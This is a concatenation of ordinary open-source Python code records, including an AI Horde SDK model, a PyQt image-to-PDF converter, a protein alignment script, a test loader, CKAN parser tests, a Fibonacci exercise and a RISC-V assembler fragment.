for form in self.forms:\n if not isinstance(form, AlchemyPopFormPayload):\n logger.warning(f\"Skipping form {form} as it is not an AlchemyPopFormPayload\")\n continue\n if form.id_:\n all_ids.append({\"id\": form.id_})\n\n return all_ids\n\n @override\n @classmethod\n def get_follow_up_request_types(cls) -> list[type[AlchemyJobSubmitRequest]]: # type: ignore[override]\n \"\"\"Return a list of all the possible follow up request types for this response.\"\"\"\n return [AlchemyJobSubmitRequest]\n\n\nclass AlchemyPopRequest(BaseAIHordeRequest, APIKeyAllowedInRequestMixin):\n \"\"\"Represents the data needed to make a request to the `/v2/interrogate/pop` endpoint.\n\n v2 API Model: `InterrogationPopInput`\n \"\"\"\n\n name: str\n priority_usernames: list[str]\n forms: list[KNOWN_ALCHEMY_TYPES]\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"InterrogationPopInput\"\n\n @override\n @classmethod\n def get_http_method(cls) -> HTTPMethod:\n return HTTPMethod.POST\n\n @override\n @classmethod\n def get_api_endpoint_subpath(cls) -> AI_HORDE_API_ENDPOINT_SUBPATH:\n return AI_HORDE_API_ENDPOINT_SUBPATH.v2_interrogate_pop\n\n @override\n @classmethod\n def get_default_success_response_type(cls) -> type[AlchemyPopResponse]:\n return AlchemyPopResponse\n","repo_name":"Haidra-Org/horde-sdk","sub_path":"horde_sdk/ai_horde_api/apimodels/alchemy/_pop.py","file_name":"_pop.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"72300860703","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport sys\r\nimport os\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nimport glob\r\nfrom PIL import *\r\nfrom img2pdf import *\r\nfrom reportlab.lib.pagesizes import letter\r\nfrom reportlab.pdfgen import canvas\r\n\r\n\r\nclass Ui_MainWindow(QWidget):\r\n def setupUi(self, MainWindow):\r\n self.dir_label = QtWidgets.QLabel(MainWindow)\r\n self.dir_label.setGeometry(QtCore.QRect(10, 10, 100, 20))\r\n self.dir_label.setText(\"Выбрана директория: \")\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(500, 350)\r\n MainWindow.setStyleSheet(\r\n \"background-color: rgb(170, 255, 255);\\n\"\r\n \"background-color: rgb(237, 255, 203);\")\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(0, 0, 500, 50))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Seagull\")\r\n font.setPointSize(11)\r\n font.setBold(True)\r\n font.setItalic(False)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"background-color: rgb(188, 185, 255);\")\r\n self.label.setObjectName(\"label\")\r\n\r\n self.button_JPG = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_JPG.setGeometry(QtCore.QRect(30, 70, 100, 25))\r\n self.button_JPG.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_JPG.setObjectName(\"button_JPG\")\r\n\r\n self.button_PNG = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_PNG.setGeometry(QtCore.QRect(30, 140, 100, 25))\r\n self.button_PNG.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_PNG.setObjectName(\"button_PNG\")\r\n\r\n self.button_TIFF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_TIFF.setGeometry(QtCore.QRect(370, 70, 100, 25))\r\n self.button_TIFF.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_TIFF.setObjectName(\"button_TIFF\")\r\n\r\n self.button_RAW = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_RAW.setGeometry(QtCore.QRect(370, 140, 100, 25))\r\n self.button_RAW.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_RAW.setObjectName(\"button_RAW\")\r\n\r\n self.button_BMP = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_BMP.setGeometry(QtCore.QRect(195, 140, 100, 25))\r\n self.button_BMP.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_BMP.setObjectName(\"button_BMP\")\r\n\r\n self.button_GIF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_GIF.setGeometry(QtCore.QRect(195, 70, 100, 25))\r\n self.button_GIF.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_GIF.setObjectName(\"button_GIF\")\r\n\r\n self.button_convert = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_convert.setGeometry(QtCore.QRect(50, 250, 150, 50))\r\n self.button_convert.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_convert.setObjectName(\"button_convert\")\r\n\r\n self.button_convert_TIFF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_convert_TIFF.setGeometry(QtCore.QRect(300, 250, 150, 50))\r\n self.button_convert_TIFF.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_convert_TIFF.setObjectName(\"button_convert_TIFF\")\r\n\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 500, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n\r\n self.button_JPG.clicked.connect(self.choose_table_JPG)\r\n self.button_PNG.clicked.connect(self.choose_table_PNG)\r\n self.button_GIF.clicked.connect(self.choose_table_GIF)\r\n self.button_BMP.clicked.connect(self.choose_table_BMP)\r\n self.button_TIFF.clicked.connect(self.choose_table_TIFF)\r\n self.button_RAW.clicked.connect(self.choose_table_RAW)\r\n\r\n self.button_JPG.clicked.connect(self.onClick)\r\n self.button_PNG.clicked.connect(self.onClick)\r\n self.button_BMP.clicked.connect(self.onClick)\r\n self.button_GIF.clicked.connect(self.onClick)\r\n self.button_TIFF.clicked.connect(self.onClick)\r\n self.button_RAW.clicked.connect(self.onClick)\r\n\r\n self.button_convert.clicked.connect(self.converter)\r\n self.button_convert_TIFF.clicked.connect(self.convert_TIFF)\r\n\r\n\r\n def retranslateUi(self, MainWindow):\r\n self.setWindowIcon(QIcon('web/icon.png'))\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Конвертатер в PDF\"))\r\n self.label.setText(_translate(\"MainWindow\", \" Программа для конвертации различных файлов в формат PDF\"))\r\n self.button_JPG.setText(_translate(\"MainWindow\", \"Файл JPG\"))\r\n self.button_PNG.setText(_translate(\"MainWindow\", \"Файл PNG\"))\r\n self.button_TIFF.setText(_translate(\"MainWindow\", \"Файл TIFF\"))\r\n self.button_BMP.setText(_translate(\"MainWindow\", \"Файл BMP\"))\r\n self.button_GIF.setText(_translate(\"MainWindow\", \"Файл GIF\"))\r\n self.button_RAW.setText(_translate(\"MainWindow\", \"Файл RAW\"))\r\n self.button_convert.setText(_translate(\"MainWindow\", \"Конвертировать\"))\r\n self.button_convert_TIFF.setText(_translate(\"MainWindow\", \"Конвертировать TIFF в JPG\"))\r\n\r\n\r\n\r\n def choose_table_files(self, file_type):\r\n image_files, _ = QFileDialog.getOpenFileNames(self, 'Выберите файл', os.path.expanduser(\"~\"), f'Image files (*.{file_type})')\r\n if image_files:\r\n for image_file in image_files:\r\n pixmap = QPixmap(image_file)\r\n self.label.setPixmap(pixmap)\r\n self.file_type = file_type\r\n return image_files\r\n\r\n def choose_table_JPG(self):\r\n self.choose_table_files('jpg')\r\n return\r\n\r\n\r\n def choose_table_PNG(self):\r\n self.choose_table_files('png')\r\n return\r\n\r\n\r\n def choose_table_GIF(self):\r\n self.choose_table_files('gif')\r\n return\r\n\r\n\r\n def choose_table_BMP(self):\r\n self.choose_table_files('bmp')\r\n return\r\n\r\n\r\n def choose_table_TIFF(self):\r\n self.choose_table_files('tif')\r\n return\r\n\r\n\r\n def choose_table_RAW(self):\r\n self.choose_table_files('raw')\r\n return\r\n\r\n\r\n def onClick(self):\r\n directory = QFileDialog.getExistingDirectory(self, \"Выберите папку для сохранения\")\r\n if directory:\r\n self.thedir = str(directory)\r\n print('Выбрана директория: ' + self.thedir)\r\n self.dir_label.setText(self.thedir)\r\n else:\r\n print('Директория не выбрана.')\r\n return\r\n\r\n\r\n def convert_TIFF(self):\r\n for files in glob.glob(os.path.join(self.thedir, '*.tiff')):\r\n name_wo_ext = os.path.splitext(files)[0]\r\n with Image.open(files) as im:\r\n rgb_convert = im.convert('RGB')\r\n rgb_convert.save(name_wo_ext + '.jpg')\r\n print(\"Конвертация TIFF-изображений в JPG завершена\")\r\n return\r\n \r\n def converter(self):\r\n imgs = []\r\n for r, _, f in os.walk(self.thedir):\r\n for fname in f:\r\n if not fname.endswith((\".jpg\", \".png\", \".bmp\", \".tiff\", \".tif\", \".gif\", \".raw\")):\r\n continue\r\n imgs.append(os.path.join(r, fname))\r\n pdf = canvas.Canvas(os.path.join(self.thedir, 'WORK.pdf'), pagesize=letter)\r\n for img_path in imgs:\r\n with Image.open(img_path) as img:\r\n width, height = img.size\r\n if width > height:\r\n pdf.setPageSize((height, width))\r\n else:\r\n pdf.setPageSize((width, height))\r\n pdf.drawImage(img_path, 0, 0, width, height)\r\n pdf.showPage()\r\n pdf.save()\r\n print(\"Конвертация в PDF завершена\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"Vlados684/Converter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21159576886","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor: Anna-Marie Seelen\nStudentnumber:1008970\nDescription: alignment of protein sequences to a reference protein sequence\nand returning stats\nUsage: python3\n\"\"\"\n# import statement\nfrom sys import argv\nimport re\nimport subprocess\nimport os.path\n\n# functions\ndef parse_input(fileref, filerelated):\n \"\"\"Return protein sequences from two input files\n\n fileref: str, name of input file with the reference protein sequence\n in fasta format\n filerelated: str, name of input file with the protein sequences to compare\n to the reference protein sequence in fasta format\n return: dict, with name of sequence as key and protein sequence as value\n \"\"\"\n lines=(open(fileref))\n dict={}\n for line in lines:\n line=line.strip()\n if line.startswith(\">\"):\n line=line.replace(\">\", \"\")\n occur = re.search(r'Guanine', line)\n index=occur.start()\n line=line[0:index-1]\n dict[line]=\"\"\n else:\n key=list(dict)[-1]\n dict[key]+=line\n lines=(open(filerelated))\n for line in lines:\n line=line.strip()\n if line.startswith(\">\"):\n line=line.replace(\">\", \"\")\n occur = re.search(r'Guanine', line)\n index=occur.start()\n line=line[0:index-1]\n dict[line]=\"\"\n else:\n key=list(dict)[-1]\n dict[key]+=line\n return dict\n\ndef lenght_seq(dict):\n \"\"\"Calculates the lenght of a protein seq\n\n dict: dict, with name of sequence as key and protein sequence as value\n return: dict, with name of sequence as key and sequence \n lenght as value\n \"\"\"\n dict_with_lenght={}\n for key in dict:\n lenght_seq=len(dict[key])\n dict_with_lenght[key]=lenght_seq\n return dict_with_lenght\n \ndef write_files(dict):\n #for i in range(1,len(dict))\n file_ref=open(\"ref.fasta\", \"w\")\n file_ref.write(\">{}\\n\".format(list(dict.keys())[0]))\n file_ref.write(dict[list(dict.keys())[0]])\n \n file_rel=open(\"rel.fasta\", \"w\")\n file_rel.write(\">{}\\n\".format(list(dict.keys())[1]))\n file_rel.write(dict[list(dict.keys())[1]])\n \n file_ref.close()\n file_rel.close()\n return (file_ref, file_rel)\n #these new files didn work when in inputted them on the comand line for \n #the needle programm so I ended up using P6ref.fasta as the files.\n\ndef run_needle():\n out_fn = \"out.needle\"\n cmd = 'needle {} {}'\\\n .format(\"P6ref.fasta\", \"P6ref.fasta\")\n #I couldn't give all arguments because needle would\n # give an error 8.0, 0.5 and out.needle have to be typed into the command\n #line.\n res = subprocess.check_output(cmd, shell=True)\n return res\n \n #out=needle(ref, rel, 8.0, 0.5, out.needle)\n #print(out.needle)\n\ndef extract_alignments(out_fn):\n lines=(open(out_fn))\n clean_lines=[]\n for line in lines:\n line=line.strip()\n if line.startswith(\"GPA1\"):\n line=''.join(filter(lambda ch: not ch.isdigit(), line))\n line = line.replace(\" \", \"\")\n line = line.replace(\"GPA_ARATH\", \"\")\n clean_lines.append(line)\n else:\n pass\n #for an even line join them, for an odd line join them\n ref_lines = []\n pro_lines = []\n for i,line in enumerate(clean_lines):\n if i%2==0:\n pro_lines.append(line)\n else:\n ref_lines.append(line)\n string_ref=\"\"\n string_rel=\"\"\n for i in ref_lines:\n string_ref+=i\n for i in pro_lines:\n string_rel+=i \n list_of_string=[]\n list_of_string.append(string_ref)\n list_of_string.append(string_rel)\n return list_of_string\n\ndef hamming_distance(list_of_string):\n \"\"\"Return the number of corresponding nucleotides that differ in two DNA sequences.\n\n DNA_seq: list of strings with two DNA sequences\n return: int, count of different corresponding nucleotides\n \"\"\"\n count=0\n for i in range(len(list_of_string[1])):\n if list_of_string[0][i] != list_of_string[1][i]:\n count+=1\n else:\n pass\n return count\n\ndef to_output_tab_file(lenght_dict, h_distance):\n \"\"\"Takes a nested sorted list and outputs a tab delimited file with the contents of each sub list on a line\n\n sorted_list: nested list with [[accession_number, organism name, GC_content, length], etc.] sorted\n in ascending GC content order\n return: tab delimited text file with the contents of each sub list on a line\n \"\"\"\n tab_file=open(\"P6_out_tab_delimited.txt\", \"w\")\n for key in lenght_dict:\n tab_file.write(\"{0}\\t{1}\\t{2}\".format(key, lenght_dict[key], h_distance))\n tab_file.write(\"\\n\")\n return None\n\ndef main():\n \"\"\"Main function of this module\"\"\"\n # step 1: parse the protein sequence from file 1 and file 2 into dict\n dict=parse_input(argv[1], argv[2])\n # step 2: determine the lenght of the sequences\n lenght_dict=lenght_seq(dict)\n # step 3: make the files for needle\n file_ref, file_rel=write_files(dict)\n # step 4: align protein sequences from file 1 to the other species in file 2\n run_needle()\n # step 5: parse needle output to extract pairwise alignments\n list_of_string=extract_alignments(argv[3])\n # step 5: calculate hamming distance between pairwise alignments\n h_distance=hamming_distance(list_of_string)\n # step 7: tab delimited file for with the alignments, containing: sequence\n to_output_tab_file(lenght_dict, h_distance)\n\nif __name__==\"__main__\":\n main()\n","repo_name":"Anna-MarieSeelen/Advanced_Bioinformatics","sub_path":"P6_test_exam.py","file_name":"P6_test_exam.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7335150318","text":"# All rights reserved by forest fairy.\n# You cannot modify or share anything without sacrifice.\n# If you don't agree, keep calm and don't look at code bellow!\n\n__author__ = \"VirtualV \"\n__date__ = \"11/01/17 12:30\"\n\nimport re\nimport inspect\nfrom config import CONFIG\nfrom unittest import defaultTestLoader\nfrom libs.core.unittest.wait import Wait\nfrom libs.core.template import NAME, SUITE_FULL\nfrom libs.core.logger import getLogger, getSysLogger\nfrom libs.core.unittest.unitcore import run, setUp, tearDown, setUpClass, tearDownClass\n\n\nclass ScanTests:\n \"\"\" Scan TestSuites to find unittests functions \"\"\"\n\n def __init__(self, logger=None):\n self.logger = logger or getLogger(__file__)\n self.syslogger = getSysLogger()\n\n async def load_tests(self, libs_options):\n \"\"\"\n Load all available Tests for selected TestSuites and update CONFIG.UNITTEST.SELECTED_TEST_CASES list.\n\n All tests packaging to **suites['tests']** list for each TestCase\n\n Tests loading via :func:`defaultTestLoader.loadTestsFromTestCase()`\n Also all unittest function like setUp, tearDown, etc. replaced with analog from\n :mod:`src.libs.core.unittest.unitcore` module.\n\n Tests packaging to dict with following structure:\n\n .. code-block:: python\n\n {'id': 'TestId', # Function name returns by id() unittest function\n 'name': 'ShortDescription', # Test description before '|' symbol returns by shortDescription() unittest function or None\n 'desc': 'FullDescription', # Test description after '|' symbol returns by shortDescription() unittest function or None\n 'index': int, # Test index to identify duplicate Tests. Starting from 1\n 'results': [], # List of results dictionaries for each global cycles. Empty before Test run\n 'test': 'Function'} # Test function link to launch\n\n Function add TestCase filter.\n\n Filters:\n load_tests: When Tests were loaded\n\n Details of **results** structure may be found in :func:`unitcore.run` function.\n Test package stored in TestSuite list for each TestCase :func:`ScanCases.generate_cases_dict`.\n \"\"\"\n # wait for selected suites\n await Wait.wait_for_selected_suites()\n\n # get function name to add to filter tags\n filter_name = inspect.getframeinfo(inspect.currentframe()).function\n\n # scan all cases\n for case in CONFIG.UNITTEST.SELECTED_TEST_CASES:\n # scan all suites\n for suite in case['suites']:\n result = []\n cls = suite['class']\n # add libs options\n if not hasattr(cls, '__libs_options'):\n setattr(cls, '__libs_options', libs_options)\n\n # replace unittest functions in Test class\n if not hasattr(cls, '__originalSetUpClass'):\n setattr(cls, '__originalSetUpClass', cls.setUpClass)\n cls.setUpClass = lambda slf=cls: setUpClass(slf)\n if not hasattr(cls, '__originalTearDownClass'):\n setattr(cls, '__originalTearDownClass', cls.tearDownClass)\n cls.tearDownClass = lambda slf=cls: tearDownClass(slf)\n if not hasattr(cls, '__originalSetUp'):\n setattr(cls, '__originalSetUp', cls.setUp)\n cls.setUp = lambda slf=cls: setUp(slf)\n if not hasattr(cls, '__originalTearDown'):\n setattr(cls, '__originalTearDown', cls.tearDown)\n cls.tearDown = lambda slf=cls: tearDown(slf)\n if not hasattr(cls, '__originalRun'):\n setattr(cls, '__originalRun', cls.run)\n cls.run = lambda slf=cls, *args, **kwargs: run(slf, *args, **kwargs)\n\n # keep default values\n # self.syslogger.info('Checking default values of [%s] class for [%s.%s] TestSuite ...'\n # % (cls.__name__, case['name'], suite['name']))\n # await self.check_default_values(cls)\n # self.syslogger.done()\n\n # get tests from class\n self.syslogger.info('Loading Tests for %s TestSuite' % SUITE_FULL.safe_substitute(case=case['name'],\n suite=suite['name'],\n index=case['index']))\n test_list = defaultTestLoader.loadTestsFromTestCase(suite['class'])\n for test in test_list._tests:\n desc = test.shortDescription()\n tid = test.id().split('.')[-1]\n # add test to TestSuite\n result.append({'id': tid.lower(),\n 'name': desc.split('|')[0].strip('-').strip().lower() if desc is not None else None,\n 'desc': desc.split('|')[1].strip() if desc is not None and desc.find('|') > -1 else desc,\n 'index': -1,\n 'results': [],\n 'test': test})\n self.syslogger.info('Found %s/%s <%s> Test' % (NAME.safe_substitute(name=tid),\n NAME.safe_substitute(name=result[-1]['name']),\n result[-1]['desc']))\n # add tests sorted by digits in test ID\n suite['tests'] = sorted(result, key=lambda data: [int(x) if x.isdigit() else x\n for x in re.split('(\\d+)', data['id'])])\n # update test index after sort\n for i, test in enumerate(suite['tests']):\n test['index'] = i+1\n\n # add auto-variables\n # ScanTests.create_auto_variables(cls, result)\n self.syslogger.done()\n\n # add filter to case\n case['filters'].append(filter_name)\n\n # @staticmethod\n # def create_auto_variables(cls, tests):\n # \"\"\"\n # Create auto-variables like testXX_cycles/NAME_cycles\n #\n # Args:\n # cls (class): Class to add variables\n # tests (list): List of Test dists\n # \"\"\"\n # for test in tests:\n # # create XX_cycles variables\n # cycle_id = '%s_cycles' % test['id']\n # value = getattr(cls, cycle_id, 0)\n # if test['name'] is not None:\n # cycle_name = '%s_cycles' % Tools.convert_name_to_variable(test['name']).lower()\n # value = value or getattr(cls, cycle_name, 1)\n # setattr(cls, cycle_name, value)\n # setattr(cls, cycle_id, value or 1)\n\n\n # @staticmethod\n # async def check_default_values(cls):\n # \"\"\"\n # Check default variables in class and restore static values to default if found or keep current static\n # values to default variables if not.\n # \"\"\"\n # # get all variables\n # variables = ([x for x in cls.__dict__ if not x.startswith('_')\n # and not hasattr(cls.__dict__[x], '__call__')\n # and not hasattr(cls.__dict__[x], '__func__')])\n # # scan all variables\n # for var in variables:\n # default = '_%s__default__%s' % (cls.__name__, var)\n # # set to default value\n # if hasattr(cls, default):\n # print('HAVE: ', default)\n # setattr(cls, var, getattr(cls, default))\n # # store default values\n # else:\n # print('SET: ', default)\n # setattr(cls, default, getattr(cls, var))\n","repo_name":"VirtualVFix/AndroidTestFramework","sub_path":"src/libs/core/unittest/scan/scantests.py","file_name":"scantests.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20432849089","text":"from 视觉模组 import *\n\n摄影机 = 设置影像撷取()\n\nwhile True:\n 阵列 = 撷取影像(摄影机)\n 阵列 = 左右翻转(阵列)\n 阵列 = 彩色转灰阶(阵列)\n \n 阵列[:, ::50] = 255\n 阵列[::50, :] = 255\n \n 显示影像(阵列)","repo_name":"beardad1975/py4t","sub_path":"source/cv4t_example/camera_slice.py","file_name":"camera_slice.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23377315012","text":"# -*- coding: utf-8 -*-\nimport nose\nimport json\nfrom ckanext.dcat.processors import RDFParser\nfrom ckanext.dcatapchharvest.tests.base_test_classes import BaseParseTest\n\neq_ = nose.tools.eq_\nassert_true = nose.tools.assert_true\n\n\nclass ConformantProfileParseTest(BaseParseTest):\n def test_dcatap_conformant_landing_page_import(self):\n contents = self._get_file_contents('conformant/dataset-landing-page.xml')\n p = RDFParser(profiles=['swiss_dcat_ap'])\n p.parse(contents)\n dataset = [d for d in p.datasets()][0]\n eq_(dataset['url'], u\"https://www.bfs.admin.ch/bfs/de/home/statistiken.html\")\n\n def test_dcatap_conformant_publisher_import(self):\n contents = self._get_file_contents('conformant/dataset-publisher.xml')\n p = RDFParser(profiles=['swiss_dcat_ap'])\n p.parse(contents)\n dataset = [d for d in p.datasets()][0]\n publisher = json.loads(dataset['publisher'])\n eq_(publisher['name'], 'Landesamt Topographie Swisstopo')\n eq_(publisher['url'], 'https://swisstopo')\n","repo_name":"opendata-swiss/ckanext-dcatapchharvest","sub_path":"ckanext/dcatapchharvest/tests/test_dcatap_ch_parse_conformant_rdf.py","file_name":"test_dcatap_ch_parse_conformant_rdf.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32851903838","text":"# 2. Дано натуральное число A > 1.\n# Определите, каким по счету числом Фибоначчи\n# оно является, то есть выведите такое число n,\n# что φ(n)=A. Если А не является числом Фибоначчи, выведите число -1.\n\n# 1 2 3 4 5 6 7 8 9 10 11\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55\n\nfibo_n = int(input())\ncount = 2\na = 0\nb = 1\n\nwhile fibo_n >= b:\n if fibo_n == b:\n print(count)\n break\n a, b = b, a + b\n count += 1\nelse:\n\tprint(-1)\n\n# решение через золотое сечение\n\n# number = int(input(\"Введите число: \"))\n# result = 1\n# count = 3\n# if number == 1:\n# \tprint(\"Номер будет и 2 и 3\")\n# elif number == 0:\n# \tprint(\"Первый номер\")\n# else:\n# \twhile result < number:\n# \t\tcount += 1\n# \t\tif result == number:\n# \t\t\tbreak\n# \t\tresult = int(round(1.68 * result, 0))\n# \t\tprint(result)\n# \tprint(\"Номер будет: \", count)","repo_name":"ElenaLuKa/Python_course","sub_path":"Lesson_2/Seminar_2/Task Se 2_2.py","file_name":"Task Se 2_2.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20581638368","text":"\nfrom pprint import pprint\n\nSizeOfInstruction = 4 # in bytes\nDEBUG = False\n\ndef debug(msg, blankline=False):\n\n\tif DEBUG:\n\t\tif blankline:\n\t\t\tprint()\n\t\telse:\n\t\t\tpprint(msg, indent=4)\n\n\"\"\"\nThere are 6 formats of instructions in RISC-V and each instruction\nbelongs to one of the 6 formats.\n\nDesign: \n\t\tInstruction is base class of 6 classes, implementing each\n\t\tof the 6 intruction formats of RISC-V.\n\t\t\n\t\t6 derived classes of Instruction class:\n\t\t\t- R_Inst\n\t\t\t- I_Inst\n\t\t\t- S_Inst\n\t\t\t- SB_Inst\n\t\t\t- U_Inst\n\t\t\t- UJ_Inst\n\"\"\"\nclass Instruction:\n\n\tinstruction = \"\" # instruction as string\n\ttokensOfInstruction = [] # instruction.split(' ')\n\topcode = \"\" # like addi, lw, sw...\n\n\topcodeInBinary = \"\" # last 7 bits of binaryInstruction\n\tbinaryInstruction = \"\" # final 32 bit binary Instruction as string\n\n\t# dictOfFields: only for debugging purpose\n\t# \t(key, value) = (field, binary value of field)\n\t# \texample:\n\t# \t\t\t{\n\t# \t\t\t\t\"immediate_7\": {0,1}^7,\n\t# \t\t\t\t\"funct3\": {0,1}^3,\n\t# \t\t\t\t...\n\t# \t\t\t}\n\tdictOfFields = {}\n\n\n\tdef __init__(self, instruction):\n\n\t\tself.instruction = instruction\n\t\tself.instruction = self.instruction.rstrip() # remove whitespace from right side of instruction\n\t\tself.tokensOfInstruction = self.instruction.split()\n\t\tself.opcode = self.tokensOfInstruction[0].lower()\n\t\tself.opcodeInBinary = self.getOpcodeInBinary()\n\n\n\t# returns 7-bit opcode as string depending on the instruction's opcode\n\tdef getOpcodeInBinary(self):\n\t\traise NotImplementedError(\"Must override getOpcodeInBinary()\")\n\n\n\t\"\"\"\n\t- Returns exactly 5-bit binary encoding for each register r0-r31\n\t- maps ra to r1\n\t- regex format of variable register: a string, \"r|R{0-31}|a\"\n\t- Zero bit extended for r0-r15\n\t- It doesn't care about case of register i.e. R13 == r13\n\t- It doesn't handle any errors like if register = s12, r342, r-21\n\t\"\"\"\n\tdef getRegisterInBinary(self, register, requiredLength=5):\n\t\t# register[1:] - to ignore 'r/R'\n\t\t# [2:] - bin returns in \"0b...\" format so ignoring first two characters\n\t\tregister = register[1:]\n\n\t\tif register == 'a': # ra mapped to r1\n\t\t\tregister = '1'\n\n\t\tif not (0 <= int(register) <= 31):\n\t\t\traise Exception(\"Unknown register: \" + self.instruction)\n\n\t\tbinaryEncoding = bin(int(register))[2:]\n\t\treturn \"0\" * (requiredLength - len(binaryEncoding)) + binaryEncoding # Zero bit extended\n\n\n\t\"\"\"\n\t- Returns binary encoding of offset/immediate\n\t- Uses 2'complement and so MSB bit extended\n\t- returns exactly \"requiredLength\" number of bits\n\t\"\"\"\n\tdef getImmediateInBinary(self, immediate, requiredLength):\n\n\t\timmediate = int(immediate)\n\n\t\t# if immediate >= 2**(requiredLength - 1) or immediate < -2**(requiredLength - 1) :\n\t\t# \traise Exception(\"Immeditate value overflow: \" + self.instruction)\n\n\t\tisNegative = immediate < 0\n\t\timmediate = abs(immediate)\n\n\t\tbinaryEncoding = bin(immediate)[2:]\n\n\t\tbinaryEncoding = \"0\" * (requiredLength - len(binaryEncoding)) \\\n\t\t\t\t\t\t + binaryEncoding # Zero-bit extended\n\n\t\tif isNegative:\n\t\t\t# convert to 2's complement form using:\n\t\t\t# https://stackoverflow.com/questions/34982608/why-does-this-twos-complement-shortcut-work\n\t\t\tlastIndexOfOne = binaryEncoding.rindex('1')\n\t\t\tbinaryEncoding = ''.join([ str(1 ^ int(i)) for i in binaryEncoding[:lastIndexOfOne] ]) \\\n\t\t\t\t\t\t\t + binaryEncoding[lastIndexOfOne:]\n\n\t\tlength = len(binaryEncoding)\n\t\treturn binaryEncoding[length - requiredLength:length]\n\n\n\t\"\"\"\n\tseparates offset and source register for store/load instruction\n\ti.e. offset(rs1) to rs1, offset in tokensOfInstruction\n\tidx = index in tokensOfInstruction where this special format is there\n\n\t\tExample: \n\t\tInstruction = sw r14 8(r2)\n\t\ttokensOfInstruction = [\"sw\", \"r14\", \"8(r2)\"]\n\t\tWe want tokensOfInstruction = [\"sw\", \"r14\", \"r2\", \"8\"]\n\t\"\"\"\n\tdef separateOffsetFromSourceRegister(self, idx):\n\n\t\tif self.opcode in [\"sw\", \"lw\"]:\n\t\t\t# registerWithOffset = \"offset(rs1)\"\"\n\t\t\tregisterWithOffset = self.tokensOfInstruction[idx]\n\t\t\tlength = len(registerWithOffset)\n\n\t\t\tself.tokensOfInstruction.pop()\n\n\t\t\tbracketIdx = registerWithOffset.index('(')\n\t\t\timmediate = registerWithOffset[:bracketIdx]\n\t\t\tregister = registerWithOffset[bracketIdx + 1: length - 1]\n\n\t\t\tself.tokensOfInstruction.extend([register, immediate])\n\n\t\telse:\n\t\t\tpass\n\n\n\tdef getBinaryInstruction(self):\n\t\treturn self.binaryInstruction\n\n\n\t# For debugging only\n\tdef debugInstruction(self):\n\t\tdebug(\"\", 